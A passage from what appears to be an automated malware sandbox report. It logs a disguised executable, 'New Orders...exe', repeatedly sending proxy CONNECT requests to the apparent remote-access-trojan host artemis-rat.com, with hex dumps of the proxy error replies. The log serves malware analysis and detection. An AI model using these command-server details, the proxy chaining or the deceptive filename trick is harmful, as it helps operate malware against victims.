                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        404192.168.2.951192104.21.85.200807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.568589926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.724387884 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        405192.168.2.951215172.64.152.98807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569078922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.724816084 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        406192.168.2.95109913.37.59.9931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569153070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.866563082 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        407192.168.2.95105291.107.180.250807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569238901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.366861105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.497840881 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        408192.168.2.951258104.16.105.198807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569272995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725256920 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        409192.168.2.951269172.67.181.147807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569338083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.724999905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        410192.168.2.951274104.17.132.79807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569406033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725217104 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        411192.168.2.951281104.16.106.234807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569459915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725152969 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        412192.168.2.951292172.67.36.21807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569518089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.724915981 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        413192.168.2.95118972.10.164.17859357672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569580078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        414192.168.2.951209107.180.90.88640817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569647074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.085539103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.710613966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.961252928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.476808071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070732117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.570643902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.664215088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.663908958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        415192.168.2.95122631.204.28.9654327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569720984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.774622917 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 65
                                                                                        Proxy-Authenticate: Basic realm="Proxy"
                                                                                        Connection: close
                                                                                        Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                        Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        416192.168.2.9498515.44.42.115583867672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.569794893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        417192.168.2.951316104.20.89.77807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570358992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.725600004 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        418192.168.2.95112282.146.37.145807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.570457935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.288825989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
